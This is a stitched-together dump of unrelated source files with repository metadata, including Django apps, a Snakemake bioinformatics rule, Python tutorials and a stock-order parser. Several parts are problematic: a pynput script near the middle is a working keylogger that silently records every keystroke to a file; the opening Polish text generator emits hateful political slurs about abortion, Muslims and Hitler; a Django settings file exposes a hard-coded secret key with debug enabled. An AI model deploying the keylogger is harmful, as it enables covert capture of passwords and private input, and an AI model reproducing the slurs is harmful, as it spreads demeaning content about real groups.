"nie dopuszczają prawicy do władzy",
"uczą dzieci homoseksualizmu"
],
[
"żeby poddawać wszystkich tresurze",
"bo taka jest ich natura",
"bo chcą wszystko kontrolować",
"bo nie rozumieją, że socjalizm nie działa",
"żeby wreszcie zapanował socjalizm",
"dokładnie tak jak tow. Janosik",
"zamiast pozwolić ludziom zarabiać",
"żeby wyrwać kobiety z domu",
"bo to jest w interesie tak zwanych ludzi pracy",
"zamiast pozwolić decydować konsumentowi",
"żeby nie opłacało się mieć dzieci",
"zamiast obniżyć podatki",
"bo nie rozumieją, że selekcja naturalna jest czymś dobrym",
"żeby mężczyźni przestali być agresywni",
"bo dzięki temu mogą brać łapówki",
"bo dzięki temu moga kraść",
"bo dostają za to pieniądze",
"bo tak się uczy w państwowej szkole",
"bo bez tego (tfu!) demokracja nie może istnieć",
"bo głupich jest więcej niż mądrych",
"bo chcą stworzyć raj na ziemi",
"bo chcą niszczyć cywilizacje białego człowieka"
],
[
"co ma zresztą tyle samo sensu, co zawody w szachach dla debili.",
"co zostało dokładnie zaplanowane w Magdalence przez śp. generała Kiszczaka.",
"i trzeba być idiotą, żeby ten system popierać.",
"ale nawet ja jeszcze dożyję normalnych czasów.",
"co dowodzi, że wyskrobano nie tych, co trzeba.",
"a zwykłym ludziom wmawiają, że im coś \"dadzą\".",
"— cóż: chcieliście (tfu!) demokracji, to macie.",
"dlatego trzeba zlikwidować koryto, a nie zmieniać świnie.",
"a wystarczyłoby przestać wypłacać zasiłki.",
"podczas gdy normalni ludzie uważani są za dziwaków.",
"co w wieku XIX po prostu by wyśmiano.",
"— dlatego w społeczeństwie jest równość, a powinno być rozwarstwienie.",
"co prowadzi polskę do katastrofy.",
"— dlatego trzeba przywrócić normalność.",
"ale w wolnej Polsce pójdą siedzieć.",
"przez kolejne kadencje.",
"o czym się nie mówi.",
"i właśnie dlatego Europa umiera.",
"ale przyjdą muzułmanie i zrobią porządek.",
"— tak samo zresztą jak za Hitlera.",
"— proszę zobaczyć, co się dzieje na Zachodzie, jeśli mi państwo nie wierzą.",
"co lat temu sto nikomu nie przyszłoby nawet do głowy."
]
]
for i in range(6):
print(choice(parts[i]), end=" ")
|
[
"stefankar1000@gmail.com"
] |
stefankar1000@gmail.com
|
24c9430411ba12db5d1fb7f0ac009a54a6d48284
|
f69aa4ac2d92102a2cc9081f6acde24f5a1125ae
|
/base/session5_dict.py
|
c9db5095044fdba3c2658c0bb787834a39e60224
|
[] |
no_license
|
jobpool/python_learning
|
9af5fd102c7698b417763c6c80947a276fc3db89
|
4e4c96d9eb1be31339c5675b6878f7ca4be83d09
|
refs/heads/master
| 2022-12-08T13:15:16.586731
| 2020-09-05T03:52:23
| 2020-09-05T03:52:23
| 287,920,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 906
|
py
|
# #字典的定义
# d1 = {"a":1,"b":2}
# print(type(d1),d1)
# #键值是唯一的
# d2 = {"a":1,"b":2,"a":3}
# print(d2)
# #键值为字符串、数字、元组,不能是列表,要求不可变数据类型
# d3 = {"a":1,2:"b",(3,4):"c"}
# print(d3)
# #访问字典
# d4= {"a":1,"b":2}
# # print(d4["c"])
# # print(d4.get("c",0))
# print(d4)
# print(d4.pop("b"))
# print(d4)
# #添加键值到字典
# d5 = {"a":1,"b":2}
# d5["c"] = 3
# print(d5)
# #修改字典
# d6 = {"a":1,"b":2}
# # d6["b"]=3
# # print(d6)
# d7 = {"a":10,"b":20,"c":30}
# # print(id(d6))
# d6.update(d7)
# # print(id(d6))
# print(d6)
#删除
# d8 = {"a":1,"b":2}
# # del(d8["b"])
# # print(d8)
# d8.pop("b")
# print(d8)
d9 = {"a":1,"b":2}
# print(list(d9.keys()))
# print(list(d9.values()))
# if "c" in d9:
# print(True)
# else:
# print(False)
if d9.get("c") is not None:
print(True)
else:
print(False)
|
[
"feilongs@microsoft.com"
] |
feilongs@microsoft.com
|
d8eaaea2b3882116225b2f51d86ed91ade2b2d10
|
3df6fe86c55315e4c29a06c7ce010999ef2bd219
|
/my_app/migrations/0005_auto_20200814_1856.py
|
8d45533ee18d59287d6c27ddcb3ce598782e00fa
|
[] |
no_license
|
sjyothip/my_projects
|
05ae591717caa95da598f23cfc93868cd380855b
|
3755854519221ab08e89e7b0de3cff04ce8bc418
|
refs/heads/master
| 2022-12-08T09:38:44.878420
| 2020-08-31T11:52:38
| 2020-08-31T11:52:38
| 290,250,652
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 584
|
py
|
# Generated by Django 3.1 on 2020-08-14 13:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('my_app', '0004_messages'),
]
operations = [
migrations.AddField(
model_name='messages',
name='profile_pic',
field=models.FileField(blank=True, null=True, upload_to='File'),
),
migrations.AddField(
model_name='messages',
name='sender_id',
field=models.CharField(blank=True, max_length=224, null=True),
),
]
|
[
"jyothis1304@gmail.com"
] |
jyothis1304@gmail.com
|
bda2afa73a058eb395fe5552b635d84a6d2f2e4d
|
c8e365146804863c90d0d37114008078514ab3df
|
/db_creation/rules/cluster_category_stats.smk
|
72e47686e0c94208e5c59aba2cba652aa7d7b683
|
[] |
no_license
|
nvt-1009/agnostos-wf
|
67fc9ac7e20af82d2ee4244debb66a6cb0657dd4
|
ece12b0cb2b55f67f4e468cb55b60dbddd11fc41
|
refs/heads/master
| 2023-04-25T19:45:06.315050
| 2021-06-06T11:08:58
| 2021-06-06T11:08:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,142
|
smk
|
rule cluster_category_stats:
input:
k_db = config["rdir"] + "/cluster_category_DB/k_cons.index",
cl_cat = config["rdir"] + "/cluster_categories/cluster_ids_categ.tsv",
threads: 28
params:
mmseqs_bin = config["mmseqs_bin"],
kaiju_bin = config["kaiju_bin"],
mpi_runner = config["mpi_runner"],
tmpl = config["mmseqs_local_tmp"],
vmtouch = config["vmtouch"],
taxdb = config["taxdb"],
gtdb = config["gtdb_tax"],
DPD = config["DPD"],
dpd_info = config["dpd_info"],
mmseqs_tax = "scripts/mmseqs_taxonomy.sh",
kaiju_tax = "scripts/kaiju_taxonomy.sh",
kaiju_parse = "scripts/kaiju_add_taxonomy.R",
stats = "scripts/cluster_category_stats.r",
ref = config["rdir"] + "/cluster_refinement/refined_clusters.tsv",
refdb = config["rdir"] + "/cluster_refinement/refined_clusterDB",
cl_cat_genes = config["rdir"] + "/cluster_categories/cluster_ids_categ_genes.tsv.gz",
tax_dir = config["rdir"] + "/cluster_category_stats/taxonomy",
tax = config["rdir"] + "/cluster_category_stats/taxonomy/cluster_mmseqs_taxonomy.tsv",
kaiju_res = config["rdir"] + "/cluster_category_stats/taxonomy/cluster_kaiju_taxonomy.tsv",
dark = config["rdir"] + "/cluster_category_stats/darkness/cluster_category_darkness.tsv",
dark_dir = config["rdir"] + "/cluster_category_stats/darkness",
compl = config["rdir"] + "/cluster_category_stats/cluster_category_completeness.tsv",
outdir = config["rdir"] + "/cluster_category_stats"
conda:
config["conda_env"]
output:
HQ_clusters = config["rdir"] + "/cluster_category_stats/HQ_clusters.tsv",
cat_stats = config["rdir"] + "/cluster_category_stats/cluster_category_summary_stats.tsv"
log:
out="logs/stats_stdout.log",
err="logs/stats_stderr.err"
benchmark:
"benchmarks/cluster_category_stats/cat_stats.tsv"
shell:
"""
## Cluster mmseqs2 taxonomy with UniProtKB
mkdir -p {params.tax_dir}
if [[ ! -s {params.tax} ]]; then
{params.vmtouch} -f {params.taxdb}
./{params.mmseqs_tax} --search {params.mmseqs_bin} \
--input {params.refdb} \
--taxdb {params.taxdb} \
--cl_info {params.cl_cat_genes} \
--output {params.tax} \
--outdir {params.outdir} \
--mpi_runner "{params.mpi_runner}" \
--threads {threads} 2>{log.err} 1>{log.out}
fi
## Cluster Kaiju taxonomy with GTDB r89
if [[ ! -s {params.kaiju_res} ]]; then
{params.vmtouch} -f {params.gtdb}
./{params.kaiju_tax} --search {params.kaiju_bin} \
--input {params.refdb} \
--taxdb {params.gtdb} \
--parsing {params.kaiju_parse} \
--output {params.kaiju_res} \
--tmpl {params.tmpl} \
--threads {threads} 2>>{log.err} 1>>{log.out}
fi
## Cluster level of darkness
mkdir -p {params.dark_dir}
if [[ ! -s {params.dark} ]]; then
# Extract all sequences from the refined database set:
sed -e 's/\\x0//g' {params.refdb} | gzip > {params.dark_dir}/refined_cl_genes.fasta.gz
# Create MMseqs2 databases
{params.mmseqs_bin} createdb {params.dark_dir}/refined_cl_genes.fasta.gz {params.dark_dir}/refined_cl_genes_db
{params.mmseqs_bin} createdb {params.DPD} {params.dark_dir}/dpd_db
# Search
{params.mmseqs_bin} search {params.dark_dir}/refined_cl_genes_db {params.dark_dir}/dpd_db \
{params.dark_dir}/refined_cl_genes_dpd_db {params.dark_dir}/tmp \
--threads {threads} --max-seqs 300 \
-e 1e-20 --cov-mode 0 -c 0.6 --mpi-runner "{params.mpi_runner}"
{params.mmseqs_bin} convertalis {params.dark_dir}/refined_cl_genes_db {params.dark_dir}/dpd_db \
{params.dark_dir}/refined_cl_genes_dpd_db {params.dark_dir}/refined_cl_genes_dpd.tsv \
--format-mode 2 --threads {threads} \
--format-output 'query,target,pident,alnlen,mismatch,gapopen,qstart,qend,tstart,tend,evalue,bits,qcov,tcov'
rm -rf {params.dark_dir}/refined_cl_orfs.fasta.gz {params.dark_dir}/refined_cl_genes_db* {params.dark_dir}/dpd_db* {params.dark_dir}/refined_cl_genes_dpd_db* {params.dark_dir}/tmp
# Extract best-hits
export LANG=C; export LC_ALL=C; sort -k1,1 -k11,11g -k13,13gr -k14,14gr {params.dark_dir}/refined_cl_genes_dpd.tsv | \
sort -u -k1,1 --merge > {params.dark_dir}/refined_cl_genes_dpd_bh.tsv
# Join with cluster categories
join -11 -23 <(awk '{{print $1,$2}}' {params.dark_dir}/refined_cl_genes_dpd_bh.tsv | sort -k1,1) \
<(sort -k3,3 <(zcat {params.cl_cat_genes})) > {params.dark}
sed -i 's/ /\\t/g' {params.dark}
fi
## Cluster general stats
./{params.stats} --ref_clu {params.ref} \
--clu_categ {input.cl_cat} \
--mmseqs_tax {params.tax} \
--kaiju_tax {params.kaiju_res} \
--clu_dark {params.dark} \
--dpd_info {params.dpd_info} \
--compl {params.compl} \
--hq_clu {output.HQ_clusters} \
--summ_stats {output.cat_stats} \
--output {params.outdir} 2>>{log.err} 1>>{log.out}
"""
rule cluster_categ_stats_done:
input:
HQ_clusters = config["rdir"] + "/cluster_category_stats/HQ_clusters.tsv",
cat_stats = config["rdir"] + "/cluster_category_stats/cluster_category_summary_stats.tsv"
output:
cat_stats_done = touch(config["rdir"] + "/cluster_category_stats/cat_stats.done")
run:
shell("echo 'COMMUNITIES INFERENCE DONE'")
|
[
"chiara.vanni5@gmail.com"
] |
chiara.vanni5@gmail.com
|
9b73734f9b2847b7b4edc6471bd2b3c3589280cf
|
94e210718afb2e9d5b4babc938adf89cd387bae7
|
/Una_Quest/users/models.py
|
62dc738dd4521ecb83a5907786b0af4d63aa7fc1
|
[] |
no_license
|
davidapdf/UnaQuest
|
8c1da0a553a580846eaab839dd3d49ae9b3c8f38
|
c725caaab5d79499e540d612f500d99bf409005a
|
refs/heads/master
| 2022-11-02T15:06:18.254716
| 2020-06-15T23:46:01
| 2020-06-15T23:46:01
| 263,780,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
from django.db import models
from django.contrib.auth.models import User
from django.contrib import admin
from django.forms import CheckboxSelectMultiple
class Unidade(models.Model):
cidade = models.CharField(max_length = 200)
estado = models.CharField(max_length = 2)
descricao = models.TextField()
class Disciplina(models.Model):
nome = models.CharField(max_length=500,blank=False,null=False)
descricao = models.TextField()
class Professor(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE)
diciplina = models.ManyToManyField(Disciplina)
unidade = models.OneToOneField(Unidade, on_delete=models.CASCADE)
def __ini__(self,user,diciplina,unidade):
self.user = user
self.diciplina = diciplina
self.unidade = unidade
class ProfessorAdmin(admin.ModelAdmin):
formfield_overrides = {
models.ManyToManyField: {'widget': CheckboxSelectMultiple},
}
list_display = ('id','user','unidade')
class Administrativo(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE)
unidade = models.OneToOneField(Unidade, on_delete=models.CASCADE)
|
[
"davidalexandre@live.com"
] |
davidalexandre@live.com
|
6811c35128a21908b5e7d9975bb069e9cf91036d
|
efcf8a7309aab135dd127f9466ce5110556b5fbc
|
/chat_app/urls.py
|
ca3fe12efbf63cbf00cb953fc9cb23087bb54222
|
[] |
no_license
|
garizs/chatApp
|
62371d035b32c80cd1322848ecc4c82ea91a3d1b
|
8eb3d5b509f317cb40295e7d4d37f14c0bd2d855
|
refs/heads/master
| 2023-07-08T18:55:50.504650
| 2021-08-23T08:39:24
| 2021-08-23T08:39:24
| 395,544,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('<str:room_name>/', views.room, name='room')
]
|
[
"i.kolesnikov@ritg.ru"
] |
i.kolesnikov@ritg.ru
|
98244b23e0ce113db9acb33b85781abda3504fab
|
82115f52db1783a2ce963e2621bf185c61ceb419
|
/Teoría/03 Widgets para formularios/3-1 Etiquetas/programa.py
|
f824e536fbaa1c1de04e3356c2ce610ec1b992ff
|
[] |
no_license
|
lesclaz/curso-qt-pyside-udemy
|
ce227df451a7cff40d90543ee6c892ea1a6b131c
|
8b9bbf5d45e916f1d7db9411728b2759b30d2fd9
|
refs/heads/master
| 2023-07-01T18:11:47.959668
| 2021-08-03T09:38:12
| 2021-08-03T09:38:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,020
|
py
|
from PySide6.QtWidgets import QApplication, QMainWindow, QLabel
from PySide6.QtCore import QSize, Qt
from PySide6.QtGui import QFont, QPixmap
from pathlib import Path
import sys
def absPath(file):
# Devuelve la ruta absoluta a un fichero desde el propio script
return str(Path(__file__).parent.absolute() / file)
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setMinimumSize(QSize(480, 320))
etiqueta = QLabel("Soy una etiqueta")
self.setCentralWidget(etiqueta)
# Creamos la imagen
imagen = QPixmap(absPath("naturaleza.jpg"))
# la asginamos a la etiqueta
etiqueta.setPixmap(imagen)
# hacemos que se escale con la ventana
etiqueta.setScaledContents(True)
# establecemos unas flags de alineamiento
etiqueta.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
if __name__ == "__main__":
app = QApplication()
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
[
"hcostaguzman@gmail.com"
] |
hcostaguzman@gmail.com
|
36a1be7242226800cc31878126d2dc7d4c40a3c6
|
5ae1aff4d4b8c6e7d8aa0cb2065cdd42335c9250
|
/a.pyw
|
5f9d312fb6ef84c3e6c0383715f2a857102234eb
|
[] |
no_license
|
ShadowMaker07/Python-Keylogger
|
108d6a4991e7170f202f620119f0882ce1ba90a3
|
eaa22f43b9aacdc35556762b994d69f15d838936
|
refs/heads/main
| 2023-07-12T00:51:33.486743
| 2021-08-12T03:35:28
| 2021-08-12T03:35:28
| 395,184,063
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
pyw
|
from pynput.keyboard import Listener
def anonymous(key):
key = str(key)
if key == "Key.f12":
raise SystemExit(0)
if key == "Key.enter":
key = "\n"
if key == "Key.alt":
key = "\n"
key = key.replace("'", "")
with open("log.txt", "a") as file:
file.write(key)
print(key)
with Listener(on_press = anonymous) as hacker:
hacker.join()
|
[
"noreply@github.com"
] |
noreply@github.com
|
d2a83892c3da43a12e920ca1f2e2c8d6ddbaa060
|
0578860df5538f6e3ab6d65809566fd19012923f
|
/drf_demo/settings.py
|
acbb4408afe336945960369b6294efc2e557b23d
|
[] |
no_license
|
otykhonruk/drf_demo
|
735e7686003ed3c8ec95ebec735b350a111beb12
|
8037492519b205b7601d01a9cc2dc319a85cff1e
|
refs/heads/master
| 2022-07-20T15:16:28.178062
| 2016-07-26T13:39:25
| 2016-07-26T13:39:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,209
|
py
|
"""
Django settings for drf_demo project.
Generated by 'django-admin startproject' using Django 1.9.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#qkdwnxb)fk6o1xqj$*cgnpi(cwpi5e1ks(d5b^l+@xru+7gr-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'ip_log',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'drf_demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'drf_demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
[
"a.tihonruk@gmail.com"
] |
a.tihonruk@gmail.com
|
8e04da130720a7160ddbfe0643e293f23d80cc2b
|
f158e45c3359882b68b00bdf11b44ed5e2ef509e
|
/myvenv/bin/markdown_py
|
5448d827bfe118ca7bacdac8c5f8d872d1e48159
|
[] |
no_license
|
idie11/delevery
|
65b7ce7682f0e5e403df244407fdc3ad2d51a588
|
9f0715e53a4d09f02477a5f3629ce9a13d9db86b
|
refs/heads/master
| 2023-06-04T02:41:25.280341
| 2021-06-23T14:39:15
| 2021-06-23T14:39:15
| 379,633,695
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
#!/home/idie/Desktop/delevery/myvenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from markdown.__main__ import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"aidaitazabekova@gmail.com"
] |
aidaitazabekova@gmail.com
|
|
53b3420227436ab63200c35eefa33a3bff01cdd4
|
ab933602ef9f962e7626edc2b4a600be4bc15a31
|
/test/test.py
|
dff54603e85627ff201e11d4de530ded9236d0d6
|
[] |
no_license
|
ksahlin/scaffolder
|
0f0d2c00214c103937b8e8d2e44f3fa156caa2b5
|
cd4f12aa974e352359a8be8b631c83a5b1a358f7
|
refs/heads/master
| 2020-03-30T10:31:08.149995
| 2014-01-05T20:09:27
| 2014-01-05T20:09:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,865
|
py
|
from besst.sequence import Scaffold
from besst.sequence import SubSequence as ss
from besst.sequence import Contig
from besst import score
from besst import interval
from besst.graph import SequenceGraph as g
from besst.graph import LinearPath
from besst.util import parse_input
# we are reading lines from a file with format for each link:
#contig1 start_cord_cont1 end_cord_contig1 direction contig2 start_cord_cont2 end_cord_cont2 direction nr_links
# %observations subseq1 (coordinates on the subseq of contig1 in space separated format with '%' sign first
# %observations subseq2 (coordinates on the subseq of contig1 in space separated format with '%' sign first
# True sequence: AAACCCGGGTTT
##
#preprocessing module
c1 = Contig('contig1','AAAGGG') # this should be split
c2 = Contig('contig2','AAAGGG') # this should be split and rc
print(c1.sequence)
s1 = ss('s1',c1,0,3)
s2 = ss('s2',c1,3,6)
s3 = ss('s3',c2,0,3)
s4 = ss('s4',c2,3,6)
print len(s1),len(s2)
# scaf = Scaffold('scaf1')
# # scaf.add_subsequence(s2,False,0)
# scaf.add_subsequence(s1,False,7)
print(s1)
print(s2)
# print(scaf)
G = g()
G.add_node(s1)
G.add_node(s2)
G.add_node(s3)
G.add_node(s4)
G.add_edge((s1,True),(s4,True),d=0,s=score.nr_links(10))
G.add_edge((s2,True),(s3,True),d=0,s=score.nr_links(12))
G.add_edge((s4,False),(s2,False),d=0,s=score.nr_links(7))
# false link!
G.add_edge((s1,True),(s1,False),d=0,s=score.nr_links(5))
# G.add_edge()
print 'GRAPH:'
for edge in G.edges():
repr(edge[0][0])
repr(edge[1][0])
print len(G.edges())
G.remove_self_links()
# for edge in G.iteredges():
# print edge
# print G[edge[0]][edge[1]]['s']
score_list=[]
for node in G.nodes_iter():
nbrs = G.neighbors(node)
if nbrs:
i = interval.Interval(node)
for nbr in nbrs:
start = G[node][nbr]['d']
end = G[node][nbr]['d'] + len(nbr[0])
weight = G[node][nbr]['s']
i.add_interval(nbr,start,end,weight)
# print i.intervals
i.weighted_interval_scheduling()
score_list.append(i)
print score_list
print sorted(score_list,reverse=True,key=lambda x:x.score)
visited = set()
for interval_object in sorted(score_list,reverse=True,key=lambda x : x.score):
potential_nodes_to_join =set()
potential_nodes_to_join.add(interval_object.startnode)
if len(interval_object.optimal_path) > 1:
for seq_obj in map(lambda x: x[3][0], interval_object.optimal_path[:-1]):
potential_nodes_to_join.add(seq_obj,True)
potential_nodes_to_join.add(seq_obj,False)
potential_nodes_to_join.add(interval_object.optimal_path[-1][3])
if not visited.intersection(potential_nodes_to_join):
# print 'enter here'
# print len(G.edges())
# make trusted path create an unbreakable linear path in the
# scaffold graph and returns all the visited nodes
visited_nodes = G.make_trusted_path(interval_object)
visited.update(visited_nodes)
print 'GRAPH:'
for edge in G.edges():
print (edge[0][0]),
print(edge[1][0])
##
# Make scaffolds
# find start nodes
start_nodes = set()
for node in G.nodes_iter():
##
# fount start node
if not G.neighbors((node[0],True)):
start_nodes.add((node[0],True))
if not G.neighbors((node[0],False)):
start_nodes.add((node[0],False))
print 'start nodes',start_nodes
for node in G.nodes():
print repr(node[0]), node
visited =set()
scaffold_index = 1
for start_node in start_nodes:
if start_node not in visited:
print 'Making scaffold',scaffold_index
s = Scaffold(scaffold_index)
scaffold_index += 1
path = LinearPath(G,start_node)
for node,gap in path:
print node[0].contig.name
if node[1]:
node[0].rc = False
s(str(node[0]))
else:
node[0].rc = True
s(str(node[0]))
if gap <= 0:
s('n')
else:
s('N'*gap)
visited.add(start_node)
visited.add(node)
print visited
print s
# print (G.neighbors((s1,True)))
#print G.most_likely_neighbor((s1,True))[0].contig.name
|
[
"kr_sahlin@hotmail.com"
] |
kr_sahlin@hotmail.com
|
b83f94235e23af5608c2cf8417a4d8a871840a23
|
ae8e406cd4ece587f124895193661da66ae051d7
|
/Bigflow/BranchExp/tasks.py
|
f8feb188a780afaf447db6e29870528e7ff4c46d
|
[] |
no_license
|
vigneashvicky/Bigflow
|
9dfaa4b94426973ef2f2972e84ed87dfeda93771
|
eec202312b482f191dd40111c473e636e0aa6978
|
refs/heads/master
| 2022-12-12T00:14:04.619978
| 2020-03-17T09:43:10
| 2020-03-17T09:43:10
| 235,542,581
| 0
| 0
| null | 2022-12-08T01:05:14
| 2020-01-22T09:47:31
|
HTML
|
UTF-8
|
Python
| false
| false
| 558
|
py
|
from __future__ import absolute_import, unicode_literals
from celery import task
from django.db import connection
import pandas as pd
@task()
def task_number_one():
cursor = connection.cursor()
parameters = ('SUPPLIER_DETAILS',2,1, '')
parameters = ('COLUMN', 'ECF_INSERT', '{}', 'Y',
'{"Entity_Gid": [1]}', 1, '')
cursor.callproc('sp_APExpense_Set', parameters)
cursor.execute('select @_sp_APExpense_Set_6')
sp_out_message = cursor.fetchone()
return {"MESSAGE": sp_out_message[0]}
print( sp_out_message)
print("hello")
|
[
"vigneasraju@gmail.com"
] |
vigneasraju@gmail.com
|
87029e6698765d7c798ef1ff788ce84fbba0d878
|
e120a272e3a94170f013af5a8f763519ccedc725
|
/backend/api/tests/tests_user.py
|
4afc7b7014801b58142611a9c71b4f85eeac039a
|
[
"MIT"
] |
permissive
|
ardilom/project_template
|
e318248fc4182fbb32819f255543c65e30bc4103
|
e42fbf73da7037074f160a31201cae70d7a027dc
|
refs/heads/master
| 2022-12-11T13:29:49.072417
| 2020-09-13T12:31:08
| 2020-09-13T12:31:08
| 295,138,469
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# django
from django.urls import reverse
# models
from backend.api.models import User
# django rest
from rest_framework.test import APITestCase
class OKUserCreationTestCase(APITestCase):
def setUp(self):
self.name = "Test"
self.last_name = "User"
self.email = "testuser@gmail.com"
self.password = "testuser"
def test_create_user(self):
user = User.objects.create_superuser(
email=self.email,
password=self.password,
first_name=self.name,
last_name=self.last_name
)
self.assertIsNotNone(user, msg="Null!")
|
[
"fardila120@gmail.com"
] |
fardila120@gmail.com
|
fdad88fdb6c73ddb643e0f4ef0fbe3221a259018
|
7afbfd3bd0f6c205546b5b159a03f5a10637d28e
|
/Part2B_hsn1017_eunzle95.py
|
7e3b94be6a3fae139fffd3c35ca501ab8e2d8529
|
[] |
no_license
|
eunzle95/Project1_blog
|
9bbf84707502701f9b94457d03f40b9809f6e232
|
71a97fc48658dcae31db212520f857ea18869ee8
|
refs/heads/master
| 2020-08-11T07:02:12.054980
| 2019-10-11T21:42:14
| 2019-10-11T21:42:14
| 214,514,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,039
|
py
|
import re
symbols = ['AAPL', 'HP', 'IBM', 'AMZN', 'MSFT', 'GOOGL', 'INTC', 'CSCO', 'ORCL', 'QCOM']
# example input
# (34 AAPL shares buy at max 780, 24 IN shares sell at min 228) for account Hokie123
# (AAPL shares cancelled, IBM shares cancelled) for account Hokie123
s = raw_input()
# trades = 34 AAPL shares buy at max 780, 24 IBM shares sell at min 228, 12 AAPL shares buy at max 27
# trades = AAPL shares cancelled, IBM shares cancelled
trades = s[s.find("(")+1:s.find(")")]
# trade = ['34 AAPL shares buy at max 780', '24 IBM shares sell at min 228', '12 AAPL shares buy at max 27']
# trade = ['AAPL shares cancelled', 'IBM shares cancelled']
trade = trades.split(",")
#extraString = for account Hokie123
extraString = s.split(")")[1]
# checking trade syntax
for t in trade:
if len(t.split()) != 7:
print("syntax error")
exit()
# processing trade requests
for t in trade:
string = t
num1 = string.split()[0]
symbol = string.split()[1]
action = string.split()[3]
action2 = string.split()[4]
action3 = string.split()[5]
num2 = string.split()[6]
# check number syntax
p = re.compile('^[1-9]+[0-9]*$')
m1 = p.match(num1)
m2 = p.match(num2)
# No error in num1 and num2
if m1 and m2:
if action2 == "at":
if action == "buy":
if action3 == "max":
action = "BuyRequests"
else:
errorPosition = string.find(action3)
formerString = string.split(action3)
print(formerString[0] + action3)
print(" " * int(errorPosition) + "^")
exit()
elif action == "sell":
if action3 == "min":
action = "SellRequests"
else:
errorPosition = string.find(action3)
formerString = string.split(action3)
print(formerString[0] + action3)
print(" " * int(errorPosition) + "^")
exit()
elif action == "cancel":
if action3 == "request":
action = "CancelReqeusts"
else:
errorPosition = string.find(action3)
formerString = string.split(action3)
print(formerString[0] + action3)
print(" " * int(errorPosition) + "^")
exit()
else:
errorPosition = string.find(action)
formerString = string.split(action)
print(formerString[0] + action)
print(" " * int(errorPosition) + "^")
exit()
# first number syntax error
elif not m1:
errorPosition = s.find(num1)
formerString = s.split(num1)
print(formerString[0] + num1)
print(" " * int(errorPosition) + "^")
exit()
# second number syntax error
else:
errorPosition = s.find(num2)
formerString = s.split(num2)
print(formerString[0] + num2)
print(" " * int(errorPosition) + "^")
exit()
# check for shares grammar
if t.split()[2] != "shares":
errorPosition = s.find(t.split()[2])
formerString = s.split(t.split()[2])
print(formerString[0] + t.split()[2])
print(" " * int(errorPosition) + "^")
exit()
# when symbol is not in the given list of symbol
if symbol not in symbols:
errorPosition = s.find(symbol)
formerString = s.split(symbol)
print(formerString[0] + symbol)
print(" " * int(errorPosition) + "^")
exit()
# for account syntax checking
if extraString.split(" ", 3)[1] != "for":
errorPosition = s.find(extraString.split(" ", 3)[1])
formerString = s.split(extraString.split(" ", 3)[1])
print(formerString[0] + extraString.split(" ", 3)[1])
print(" " * int(errorPosition) + "^")
exit()
elif extraString.split(" ", 3)[2] != "account":
